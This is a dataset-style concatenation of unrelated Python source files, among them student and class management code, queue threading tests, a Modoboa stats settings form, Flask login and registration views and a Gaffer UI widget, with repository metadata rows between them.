if not user_exists(p['username']):
name = generate_user_name(p['first_name'], p['last_name'])
ds.add(m.User(id=p['username'], name=name, role=get_role('Admin')))
ds.commit()
the_user = get_user(p['username'])
class_professors.append(the_user)
if class_name and class_time:
class_id = generate_class_id(class_name, class_time)
# If the class already exists, update the professors and keep
# the students
if class_exists(class_id):
the_class = get_class(class_id)
# handle the change of class and the labs associated with it
old_class_professors = [u for u in the_class.users if ((u.role_name == 'Admin') or (u.role_name == 'SuperAdmin'))]
for p in class_professors:
# Add the class to the professor's class list if it is not
# the list now.
if not (class_id in [c.id for c in p.classes]):
p.classes.append(the_class)
for lab in the_class.labs:
if not (lab in p.labs):
p.labs.append(lab)
ds.commit()
# Remove the class from the old professor's class list
# if the professor is no longer in the class's user list.
for p in old_class_professors:
if not (p.id in class_professor_ids):
p.classes = [c for c in p.classes if c.id != class_id]
p.labs = [lab for lab in p.labs if lab.class_id != class_id]
# otherwise create a class with the professors
else:
ds.add(m.Class(id=class_id, name=class_name, time=class_time,
users=class_professors))
else:
return 'class_time is not valid:{}'.format(class_time)
ds.commit()
return ''
# Update the users in the classes according to registration info
def update_students_by_data_from_iris(class_id_list, registration_data):
all_classes = get_all_class()
selected_classes = [c for c in all_classes if c.id in class_id_list]
registration_by_class = {}
warning_msg = ''
# A registration_object looks like
# {"user_name":"fake1","course_id":"10256","term_code":"201501",
# "subject":"BIOL","course_number":"101","section":"FTN",
# "first_name":"Fake", "last_name":"One"}
# Add the students in the received data into the database
for registration_object in registration_data:
username = registration_object['user_name']
invalid_list = [None, 'undefined', 'null', '']
# Since username is our key for User object, it cannot be empty
# If that happens, we skip the current user
if username in invalid_list:
continue
name = generate_user_name(registration_object['first_name'],
registration_object['last_name'])
class_id = generate_class_id((registration_object['subject'] +
registration_object['course_number']),
tranlate_term_code_to_semester(registration_object['term_code']))
# only students who registered courses in the list will be updated
if class_id not in class_id_list:
continue
# If the class exists in the database, update
if class_exists(class_id):
the_class = get_class(class_id)
# If user already exists, add the class into the class list of the
# user;
# otherwise, create a user with the class
if user_exists(username):
the_user = get_user(username)
if not (class_id in [c.id for c in the_user.classes]):
the_user.classes.append(the_class)
for lab in the_class.labs:
if not (lab in the_user.labs):
the_user.labs.append(lab)
else:
the_user = m.User(id=username, name=name, classes=[the_class],
role=get_role('Student'), labs=the_class.labs)
ds.add(the_user)
# else return a warning message to notify the user
else:
warning_msg += ('class_id: ' + class_id +
' doesn\'t exist in database\n')
# for efficiency: otherwise we have to loop through
# registration_data many times
if class_id in registration_by_class:
registration_by_class[class_id].append(username)
else:
registration_by_class[class_id] = []
# Check the students of the classes in the database and update them
# according to the received data
for c in selected_classes:
# If the class exists in the received data, compare
# the users of the class in database and data
if c.id in registration_by_class:
# Keep the admins/superadmins of the class
class_new_users = [u for u in c.users if ((u.role_name == 'Admin') or (u.role_name == 'SuperAdmin'))]
# Replace the students of the class with the students in the
# received data
for student_id in registration_by_class[c.id]:
class_new_users.append(get_user(student_id))
c.users = class_new_users
else:
            warning_msg += ('class_id: ' + c.id +
' doesn\'t exist in received data\n')
ds.commit()
return warning_msg
# Delete all students in the database
# The current function will not report any warning messages
def delete_all_students():
for u in get_all_user():
if u.role_name == "Student":
ds.delete(u)
ds.commit()
return ''
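# Illustrative payload (all field values are made up) matching the structure
# that add_observations_sent_by_students() validates above:
_example_observations = [
    {
        'studentName': 'Ada',
        'observationsForOneExperiment': [
            {
                'labId': 'some-lab-id',           # made-up lab id
                'experimentName': 'temperature',  # made-up experiment name
                'observation': '42',
            },
        ],
    },
]
# add_observations_sent_by_students(_example_observations)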
|
mit
| -2,824,706,532,023,522,000
| 42.649351
| 130
| 0.538403
| false
| 4.196753
| false
| false
| false
|
Egor-Krivov/pdp
|
tests/test_base.py
|
1
|
3421
|
import unittest
import time
from contextlib import suppress
from queue import Queue as ThreadQueue
from threading import Thread
from threading import Event as ThreadEvent
import numpy as np
from pdp.base import InterruptableQueue, StopEvent, start_one2one_transformer
DEFAULT_LOOP_TIMEOUT = 0.02
def set_event_after_timeout(event, timeout):
def target():
time.sleep(timeout)
event.set()
Thread(target=target).start()
class TestInterruptableQueue(unittest.TestCase):
def setUp(self):
self.maxsize = 10
self.loop_timeout = DEFAULT_LOOP_TIMEOUT
self.wait_timeout = 7.5 * self.loop_timeout
self.receive_timeout = 0.5 * self.loop_timeout
self.stop_event = ThreadEvent()
self.q = InterruptableQueue(ThreadQueue(self.maxsize), self.loop_timeout, self.stop_event)
def test_get(self):
def target():
with suppress(StopEvent):
self.q.get()
thread = Thread(target=target)
thread.start()
self.assertTrue(thread.is_alive())
set_event_after_timeout(event=self.stop_event, timeout=self.wait_timeout + self.receive_timeout)
self.assertTrue(thread.is_alive())
time.sleep(self.wait_timeout)
self.assertTrue(thread.is_alive())
time.sleep(self.receive_timeout * 2)
self.assertFalse(thread.is_alive())
def test_put(self):
for i in range(self.maxsize):
self.q.put(i)
def target():
with suppress(StopEvent):
self.q.put(-1)
thread = Thread(target=target)
thread.start()
self.assertTrue(thread.is_alive())
set_event_after_timeout(event=self.stop_event, timeout=self.wait_timeout + self.receive_timeout)
self.assertTrue(thread.is_alive())
time.sleep(self.wait_timeout)
self.assertTrue(thread.is_alive())
time.sleep(self.receive_timeout * 2)
self.assertFalse(thread.is_alive())
class testOne2One(unittest.TestCase):
def setUp(self):
self.buffer_size = 20
self.loop_timeout = DEFAULT_LOOP_TIMEOUT
self.stop_event = ThreadEvent()
self.q_in = InterruptableQueue(ThreadQueue(self.buffer_size), self.loop_timeout, self.stop_event)
self.q_out = InterruptableQueue(ThreadQueue(self.buffer_size), self.loop_timeout, self.stop_event)
def tearDown(self):
self.q_in.join()
self.q_out.join()
def data_pass(self, n_workers):
data_in = np.random.randn(self.buffer_size * 10)
def f(x):
return x ** 2
data_out_true = f(data_in)
start_one2one_transformer(f, q_in=self.q_in, q_out=self.q_out, stop_event=self.stop_event, n_workers=n_workers)
i = 0
data_out = []
for d in data_in:
self.q_in.put(d)
i += 1
if i == self.buffer_size:
for j in range(self.buffer_size):
data_out.append(self.q_out.get())
self.q_out.task_done()
i = 0
if n_workers > 1:
data_out_true = sorted(data_out_true)
data_out = sorted(data_out)
np.testing.assert_equal(data_out, data_out_true)
def test_data_pass(self):
for n_workers in (1, 4, 10):
with self.subTest(f'n_workers={n_workers}'):
self.data_pass(n_workers=n_workers)
|
mit
| -184,339,067,233,399,360
| 29.81982
| 119
| 0.609763
| false
| 3.582199
| true
| false
| false
|
modoboa/modoboa-stats
|
modoboa_stats/forms.py
|
1
|
1691
|
"""Modoboa stats forms."""
import rrdtool
from pkg_resources import parse_version
from django.conf import settings
from django.utils.translation import ugettext_lazy
from django import forms
from modoboa.lib import form_utils
from modoboa.parameters import forms as param_forms
class ParametersForm(param_forms.AdminParametersForm):
"""Stats global parameters."""
app = "modoboa_stats"
general_sep = form_utils.SeparatorField(label=ugettext_lazy("General"))
logfile = forms.CharField(
label=ugettext_lazy("Path to the log file"),
initial="/var/log/mail.log",
help_text=ugettext_lazy("Path to log file used to collect statistics"),
widget=forms.TextInput(attrs={"class": "form-control"})
)
rrd_rootdir = forms.CharField(
label=ugettext_lazy("Directory to store RRD files"),
initial="/tmp/modoboa",
help_text=ugettext_lazy(
"Path to directory where RRD files are stored"),
widget=forms.TextInput(attrs={"class": "form-control"})
)
greylist = form_utils.YesNoField(
label=ugettext_lazy("Show greylisted messages"),
initial=False,
help_text=ugettext_lazy(
"Differentiate between hard and soft rejects (greylisting)")
)
def __init__(self, *args, **kwargs):
"""Check RRDtool version."""
super(ParametersForm, self).__init__(*args, **kwargs)
rrd_version = parse_version(rrdtool.lib_version())
required_version = parse_version("1.6.0")
test_mode = getattr(settings, "RRDTOOL_TEST_MODE", False)
if rrd_version < required_version and not test_mode:
del self.fields["greylist"]
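# Minimal illustration (not part of the original module) of the version gate
# used in __init__ above: parse_version yields objects that compare in
# version order, so anything below "1.6.0" loses the greylist field.
def _rrdtool_supports_greylist(lib_version_string):
    return parse_version(lib_version_string) >= parse_version("1.6.0")
# _rrdtool_supports_greylist("1.5.9") -> False; _rrdtool_supports_greylist("1.7.0") -> True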
|
mit
| 6,087,176,765,779,094,000
| 32.156863
| 79
| 0.66233
| false
| 3.87844
| false
| false
| false
|
bigzhao/flask-projects-manage
|
app/auth/views.py
|
1
|
2830
|
# -*- coding: utf-8 -*-
from flask import render_template, redirect, request, url_for, flash
from flask.ext.login import login_user, logout_user, login_required, current_user
from . import auth
from ..models import User
from .forms import RegisterForm, EditForm, ChangePasswdForm
from .. import db
@auth.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for("main.index"))
if request.method == 'POST':
user = User.query.filter_by(id=request.form.get('uid')).first()
if user is not None and user.verify_password(request.form.get('password')):
login_user(user, request.form.get('remember_me'))
return redirect(request.args.get('next') or url_for('main.index'))
flash(u'错误的用户名或密码.')
return render_template('auth/login.html')
@auth.route('/logout')
@login_required
def logout():
logout_user()
flash('You have been logged out.')
return redirect(url_for('main.index'))
@auth.route('/register', methods=['POST', 'GET'])
def register():
if current_user.is_authenticated:
return redirect(url_for("main.index"))
form = RegisterForm()
if form.validate_on_submit():
user = User(id=form.uid.data,
name=form.username.data.strip(),
password=form.password.data)
db.session.add(user)
db.session.commit()
flash(u'注册成功!')
return redirect(url_for(".login"))
return render_template('auth/register.html', form=form)
@auth.route('/edit_profile', methods=['POST', 'GET'])
@login_required
def edit_profile():
form = EditForm()
if form.validate_on_submit():
user = current_user._get_current_object()
user.name = form.username.data
db.session.add(user)
db.session.commit()
flash(u'用户名修改成功')
return redirect(url_for('main.index'))
form.uid.data = current_user.id
form.username.data = current_user.name
return render_template('auth/edit_profile.html', form=form)
@auth.route('/changepasswd', methods=['POST', 'GET'])
@login_required
def change_passwd():
form = ChangePasswdForm()
if form.validate_on_submit():
if current_user.verify_password(form.old_password.data):
user = current_user._get_current_object()
user.password = form.password.data
db.session.add(user)
db.session.commit()
return redirect(url_for('auth.login'))
else:
flash(u'密码错误')
return render_template('auth/change_passwd.html', form=form)
def allowed_file(filename):
'''
    Check whether the file extension is an allowed image format.
'''
return '.' in filename and \
filename.rsplit('.', 1)[1] in set(['png', 'jpg', 'jpeg', 'gif'])
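# Illustrative only (not part of the original blueprint): allowed_file accepts
# the whitelisted image extensions and rejects everything else.
def _allowed_file_examples():
    return [allowed_file('avatar.png'),    # True
            allowed_file('notes.txt'),     # False ('txt' not whitelisted)
            allowed_file('no_extension')]  # False (no '.' in the name)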
|
mit
| 6,027,085,668,962,736,000
| 29.43956
| 83
| 0.625632
| false
| 3.542199
| false
| false
| false
|
Tamriel/wagtail_room_booking
|
account/models.py
|
1
|
13705
|
from __future__ import unicode_literals
import datetime
import operator
try:
from urllib.parse import urlencode
except ImportError: # python 2
from urllib import urlencode
from django.core.urlresolvers import reverse
from django.db import models, transaction
from django.db.models import Q
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils import timezone, translation, six
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import AnonymousUser
from django.contrib.sites.models import Site
import pytz
from account import signals
from account.conf import settings
from account.fields import TimeZoneField
from account.hooks import hookset
from account.managers import EmailAddressManager, EmailConfirmationManager
from account.signals import signup_code_sent, signup_code_used
@python_2_unicode_compatible
class Account(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL, related_name="account", verbose_name=_("user"))
street = models.CharField(
_("street"),
max_length=100,
)
phone = models.CharField(
_("phone"),
max_length=100,
)
plz_city = models.CharField(
_("plz_city"),
max_length=100,
)
@classmethod
def for_request(cls, request):
user = getattr(request, "user", None)
if user and user.is_authenticated():
try:
return Account._default_manager.get(user=user)
except Account.DoesNotExist:
pass
return AnonymousAccount(request)
@classmethod
def create(cls, request=None, **kwargs):
create_email = kwargs.pop("create_email", True)
confirm_email = kwargs.pop("confirm_email", None)
account = cls(**kwargs)
if "language" not in kwargs:
if request is None:
account.language = settings.LANGUAGE_CODE
else:
account.language = translation.get_language_from_request(request, check_path=True)
account.save()
if create_email and account.user.email:
kwargs = {"primary": True}
if confirm_email is not None:
kwargs["confirm"] = confirm_email
EmailAddress.objects.add_email(account.user, account.user.email, **kwargs)
return account
def __str__(self):
return str(self.user)
def now(self):
"""
Returns a timezone aware datetime localized to the account's timezone.
"""
now = datetime.datetime.utcnow().replace(tzinfo=pytz.timezone("UTC"))
timezone = settings.TIME_ZONE if not self.timezone else self.timezone
return now.astimezone(pytz.timezone(timezone))
def localtime(self, value):
"""
Given a datetime object as value convert it to the timezone of
the account.
"""
timezone = settings.TIME_ZONE if not self.timezone else self.timezone
if value.tzinfo is None:
value = pytz.timezone(settings.TIME_ZONE).localize(value)
return value.astimezone(pytz.timezone(timezone))
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def user_post_save(sender, **kwargs):
"""
After User.save is called we check to see if it was a created user. If so,
we check if the User object wants account creation. If all passes we
create an Account object.
We only run on user creation to avoid having to check for existence on
each call to User.save.
"""
user, created = kwargs["instance"], kwargs["created"]
disabled = getattr(user, "_disable_account_creation", not settings.ACCOUNT_CREATE_ON_SAVE)
if created and not disabled:
Account.create(user=user)
@python_2_unicode_compatible
class AnonymousAccount(object):
def __init__(self, request=None):
self.user = AnonymousUser()
self.timezone = settings.TIME_ZONE
if request is None:
self.language = settings.LANGUAGE_CODE
else:
self.language = translation.get_language_from_request(request, check_path=True)
def __str__(self):
return "AnonymousAccount"
@python_2_unicode_compatible
class SignupCode(models.Model):
class AlreadyExists(Exception):
pass
class InvalidCode(Exception):
pass
code = models.CharField(_("code"), max_length=64, unique=True)
max_uses = models.PositiveIntegerField(_("max uses"), default=0)
expiry = models.DateTimeField(_("expiry"), null=True, blank=True)
inviter = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True)
email = models.EmailField(max_length=254, blank=True)
notes = models.TextField(_("notes"), blank=True)
sent = models.DateTimeField(_("sent"), null=True, blank=True)
created = models.DateTimeField(_("created"), default=timezone.now, editable=False)
use_count = models.PositiveIntegerField(_("use count"), editable=False, default=0)
class Meta:
verbose_name = _("signup code")
verbose_name_plural = _("signup codes")
def __str__(self):
if self.email:
return "{0} [{1}]".format(self.email, self.code)
else:
return self.code
@classmethod
def exists(cls, code=None, email=None):
checks = []
if code:
checks.append(Q(code=code))
if email:
            checks.append(Q(email=email))
if not checks:
return False
return cls._default_manager.filter(six.moves.reduce(operator.or_, checks)).exists()
@classmethod
def create(cls, **kwargs):
email, code = kwargs.get("email"), kwargs.get("code")
if kwargs.get("check_exists", True) and cls.exists(code=code, email=email):
raise cls.AlreadyExists()
expiry = timezone.now() + datetime.timedelta(hours=kwargs.get("expiry", 24))
if not code:
code = hookset.generate_signup_code_token(email)
params = {
"code": code,
"max_uses": kwargs.get("max_uses", 0),
"expiry": expiry,
"inviter": kwargs.get("inviter"),
"notes": kwargs.get("notes", "")
}
if email:
params["email"] = email
return cls(**params)
@classmethod
def check_code(cls, code):
try:
signup_code = cls._default_manager.get(code=code)
except cls.DoesNotExist:
raise cls.InvalidCode()
else:
if signup_code.max_uses and signup_code.max_uses <= signup_code.use_count:
raise cls.InvalidCode()
else:
if signup_code.expiry and timezone.now() > signup_code.expiry:
raise cls.InvalidCode()
else:
return signup_code
def calculate_use_count(self):
self.use_count = self.signupcoderesult_set.count()
self.save()
def use(self, user):
"""
Add a SignupCode result attached to the given user.
"""
result = SignupCodeResult()
result.signup_code = self
result.user = user
result.save()
signup_code_used.send(sender=result.__class__, signup_code_result=result)
def send(self, **kwargs):
protocol = getattr(settings, "DEFAULT_HTTP_PROTOCOL", "http")
current_site = kwargs["site"] if "site" in kwargs else Site.objects.get_current()
if "signup_url" not in kwargs:
signup_url = "{0}://{1}{2}?{3}".format(
protocol,
current_site.domain,
reverse("account_signup"),
urlencode({"code": self.code})
)
else:
signup_url = kwargs["signup_url"]
ctx = {
"signup_code": self,
"current_site": current_site,
"signup_url": signup_url,
}
ctx.update(kwargs.get("extra_ctx", {}))
hookset.send_invitation_email([self.email], ctx)
self.sent = timezone.now()
self.save()
signup_code_sent.send(sender=SignupCode, signup_code=self)
class SignupCodeResult(models.Model):
signup_code = models.ForeignKey(SignupCode)
user = models.ForeignKey(settings.AUTH_USER_MODEL)
timestamp = models.DateTimeField(default=timezone.now)
def save(self, **kwargs):
super(SignupCodeResult, self).save(**kwargs)
self.signup_code.calculate_use_count()
@python_2_unicode_compatible
class EmailAddress(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL)
email = models.EmailField(max_length=254, unique=settings.ACCOUNT_EMAIL_UNIQUE)
verified = models.BooleanField(_("verified"), default=False)
primary = models.BooleanField(_("primary"), default=False)
objects = EmailAddressManager()
class Meta:
verbose_name = _("email address")
verbose_name_plural = _("email addresses")
if not settings.ACCOUNT_EMAIL_UNIQUE:
unique_together = [("user", "email")]
def __str__(self):
return "{0} ({1})".format(self.email, self.user)
def set_as_primary(self, conditional=False):
old_primary = EmailAddress.objects.get_primary(self.user)
if old_primary:
if conditional:
return False
old_primary.primary = False
old_primary.save()
self.primary = True
self.save()
self.user.email = self.email
self.user.save()
return True
def send_confirmation(self, **kwargs):
confirmation = EmailConfirmation.create(self)
confirmation.send(**kwargs)
return confirmation
def change(self, new_email, confirm=True):
"""
Given a new email address, change self and re-confirm.
"""
with transaction.atomic():
self.user.email = new_email
self.user.save()
self.email = new_email
self.verified = False
self.save()
if confirm:
self.send_confirmation()
@python_2_unicode_compatible
class EmailConfirmation(models.Model):
email_address = models.ForeignKey(EmailAddress)
created = models.DateTimeField(default=timezone.now)
sent = models.DateTimeField(null=True)
key = models.CharField(max_length=64, unique=True)
objects = EmailConfirmationManager()
class Meta:
verbose_name = _("email confirmation")
verbose_name_plural = _("email confirmations")
def __str__(self):
return "confirmation for {0}".format(self.email_address)
@classmethod
def create(cls, email_address):
key = hookset.generate_email_confirmation_token(email_address.email)
return cls._default_manager.create(email_address=email_address, key=key)
def key_expired(self):
expiration_date = self.sent + datetime.timedelta(days=settings.ACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS)
return expiration_date <= timezone.now()
key_expired.boolean = True
def confirm(self):
if not self.key_expired() and not self.email_address.verified:
email_address = self.email_address
email_address.verified = True
email_address.set_as_primary(conditional=True)
email_address.save()
signals.email_confirmed.send(sender=self.__class__, email_address=email_address)
return email_address
def send(self, **kwargs):
current_site = kwargs["site"] if "site" in kwargs else Site.objects.get_current()
protocol = getattr(settings, "DEFAULT_HTTP_PROTOCOL", "http")
activate_url = "{0}://{1}{2}".format(
protocol,
current_site.domain,
reverse(settings.ACCOUNT_EMAIL_CONFIRMATION_URL, args=[self.key])
)
ctx = {
"email_address": self.email_address,
"user": self.email_address.user,
"activate_url": activate_url,
"current_site": current_site,
"key": self.key,
}
hookset.send_confirmation_email([self.email_address.email], ctx)
self.sent = timezone.now()
self.save()
signals.email_confirmation_sent.send(sender=self.__class__, confirmation=self)
class AccountDeletion(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True, on_delete=models.SET_NULL)
email = models.EmailField(max_length=254)
date_requested = models.DateTimeField(_("date requested"), default=timezone.now)
date_expunged = models.DateTimeField(_("date expunged"), null=True, blank=True)
class Meta:
verbose_name = _("account deletion")
verbose_name_plural = _("account deletions")
@classmethod
def expunge(cls, hours_ago=None):
if hours_ago is None:
hours_ago = settings.ACCOUNT_DELETION_EXPUNGE_HOURS
before = timezone.now() - datetime.timedelta(hours=hours_ago)
count = 0
for account_deletion in cls.objects.filter(date_requested__lt=before, user__isnull=False):
settings.ACCOUNT_DELETION_EXPUNGE_CALLBACK(account_deletion)
account_deletion.date_expunged = timezone.now()
account_deletion.save()
count += 1
return count
@classmethod
def mark(cls, user):
account_deletion, created = cls.objects.get_or_create(user=user)
account_deletion.email = user.email
account_deletion.save()
settings.ACCOUNT_DELETION_MARK_CALLBACK(account_deletion)
return account_deletion
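# Illustrative sketch (not part of the original module): the intended
# invitation flow built from the models above, assuming `user` is a saved
# user instance and the email address is hypothetical.
def _example_invite_flow(user, email="invitee@example.com"):
    code = SignupCode.create(email=email, max_uses=1)
    code.save()
    checked = SignupCode.check_code(code.code)  # raises SignupCode.InvalidCode if spent or expired
    checked.use(user)                           # records a SignupCodeResult against `user`
    return checked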
|
gpl-3.0
| 7,228,095,418,603,898,000
| 34.505181
| 110
| 0.624954
| false
| 4.1305
| false
| false
| false
|
appleseedhq/gaffer
|
python/GafferUI/CompoundDataPlugValueWidget.py
|
1
|
9030
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import imath
import IECore
import Gaffer
import GafferUI
## Supported plug metadata :
#
# "compoundDataPlugValueWidget:editable"
class CompoundDataPlugValueWidget( GafferUI.PlugValueWidget ) :
def __init__( self, plug, **kw ) :
self.__column = GafferUI.ListContainer( spacing = 6 )
GafferUI.PlugValueWidget.__init__( self, self.__column, plug, **kw )
with self.__column :
self.__layout = GafferUI.PlugLayout( plug )
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal ) as self.__editRow :
GafferUI.Spacer( imath.V2i( GafferUI.PlugWidget.labelWidth(), 1 ) )
GafferUI.MenuButton(
image = "plus.png",
hasFrame = False,
menu = GafferUI.Menu( Gaffer.WeakMethod( self.__addMenuDefinition ) )
)
GafferUI.Spacer( imath.V2i( 1 ), imath.V2i( 999999, 1 ), parenting = { "expand" : True } )
self._updateFromPlug()
def hasLabel( self ) :
return True
def setPlug( self, plug ) :
GafferUI.PlugValueWidget.setPlug( self, plug )
self.__layout = GafferUI.PlugLayout( plug )
self.__column[0] = self.__layout
def setReadOnly( self, readOnly ) :
if readOnly == self.getReadOnly() :
return
GafferUI.PlugValueWidget.setReadOnly( self, readOnly )
self.__layout.setReadOnly( readOnly )
def childPlugValueWidget( self, childPlug, lazy=True ) :
return self.__layout.plugValueWidget( childPlug, lazy )
def _updateFromPlug( self ) :
editable = True
readOnly = False
if self.getPlug() is not None :
editable = Gaffer.Metadata.value( self.getPlug(), "compoundDataPlugValueWidget:editable" )
editable = editable if editable is not None else True
readOnly = Gaffer.MetadataAlgo.readOnly( self.getPlug() )
self.__editRow.setVisible( editable )
self.__editRow.setEnabled( not readOnly )
def __addMenuDefinition( self ) :
result = IECore.MenuDefinition()
result.append( "/Add/Bool", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.BoolData( False ) ) } )
result.append( "/Add/Float", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.FloatData( 0 ) ) } )
result.append( "/Add/Int", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.IntData( 0 ) ) } )
result.append( "/Add/NumericDivider", { "divider" : True } )
result.append( "/Add/String", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.StringData( "" ) ) } )
result.append( "/Add/StringDivider", { "divider" : True } )
result.append( "/Add/V2i/Vector", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2iData( imath.V2i( 0 ), IECore.GeometricData.Interpretation.Vector ) ) } )
result.append( "/Add/V2i/Normal", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2iData( imath.V2i( 0 ), IECore.GeometricData.Interpretation.Normal ) ) } )
result.append( "/Add/V2i/Point", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2iData( imath.V2i( 0 ), IECore.GeometricData.Interpretation.Point ) ) } )
result.append( "/Add/V3i/Vector", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3iData( imath.V3i( 0 ), IECore.GeometricData.Interpretation.Vector ) ) } )
result.append( "/Add/V3i/Normal", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3iData( imath.V3i( 0 ), IECore.GeometricData.Interpretation.Normal ) ) } )
result.append( "/Add/V3i/Point", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3iData( imath.V3i( 0 ), IECore.GeometricData.Interpretation.Point ) ) } )
result.append( "/Add/V2f/Vector", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2fData( imath.V2f( 0 ), IECore.GeometricData.Interpretation.Vector ) ) } )
result.append( "/Add/V2f/Normal", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2fData( imath.V2f( 0 ), IECore.GeometricData.Interpretation.Normal ) ) } )
result.append( "/Add/V2f/Point", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2fData( imath.V2f( 0 ), IECore.GeometricData.Interpretation.Point ) ) } )
result.append( "/Add/V3f/Vector", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3fData( imath.V3f( 0 ), IECore.GeometricData.Interpretation.Vector ) ) } )
result.append( "/Add/V3f/Normal", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3fData( imath.V3f( 0 ), IECore.GeometricData.Interpretation.Normal ) ) } )
result.append( "/Add/V3f/Point", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3fData( imath.V3f( 0 ), IECore.GeometricData.Interpretation.Point ) ) } )
result.append( "/Add/VectorDivider", { "divider" : True } )
result.append( "/Add/Color3f", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Color3fData( imath.Color3f( 0 ) ) ) } )
result.append( "/Add/Color4f", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Color4fData( imath.Color4f( 0, 0, 0, 1 ) ) ) } )
result.append( "/Add/BoxDivider", { "divider" : True } )
result.append( "/Add/Box2i", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Box2iData( imath.Box2i( imath.V2i( 0 ), imath.V2i( 1 ) ) ) ) } )
result.append( "/Add/Box2f", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Box2fData( imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ) ) ) } )
result.append( "/Add/Box3i", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Box3iData( imath.Box3i( imath.V3i( 0 ), imath.V3i( 1 ) ) ) ) } )
result.append( "/Add/Box3f", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Box3fData( imath.Box3f( imath.V3f( 0 ), imath.V3f( 1 ) ) ) ) } )
result.append( "/Add/BoxDivider", { "divider" : True } )
for label, plugType in [
( "Float", Gaffer.FloatVectorDataPlug ),
( "Int", Gaffer.IntVectorDataPlug),
( "NumericDivider", None ),
( "String", Gaffer.StringVectorDataPlug ),
] :
if plugType is not None :
result.append( "/Add/Array/" + label, {"command" : IECore.curry( Gaffer.WeakMethod( self.__addItem ), "", plugType.ValueType() ) } )
else :
result.append( "/Add/Array/" + label, { "divider" : True } )
return result
def __addItem( self, name, value ) :
with Gaffer.UndoScope( self.getPlug().ancestor( Gaffer.ScriptNode ) ) :
self.getPlug().addChild( Gaffer.NameValuePlug( name, value, True, "member1", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ) )
GafferUI.PlugValueWidget.registerType( Gaffer.CompoundDataPlug, CompoundDataPlugValueWidget )
##########################################################################
# Plug metadata
##########################################################################
Gaffer.Metadata.registerValue( Gaffer.CompoundDataPlug, "*", "deletable", lambda plug : plug.getFlags( Gaffer.Plug.Flags.Dynamic ) )
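# Illustrative note (not part of the original file): the
# "compoundDataPlugValueWidget:editable" metadata read in _updateFromPlug()
# can also be registered against an individual plug to hide the "+" row;
# the node and plug names below are hypothetical.
#   Gaffer.Metadata.registerValue( node["user"]["myCompoundData"], "compoundDataPlugValueWidget:editable", False )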
|
bsd-3-clause
| 551,014,885,235,974,460
| 50.306818
| 192
| 0.670764
| false
| 3.356877
| false
| false
| false
|
bobismijnnaam/bobe-euler
|
48/Utils.py
|
1
|
12422
|
#!/usr/bin/env python3
import collections
# skim seems to be intensive and doing a lot of work even though in some
# cases it could do less. For example, in add, you can stop skimming if after
# skimming the first two cells the carrier is 0.
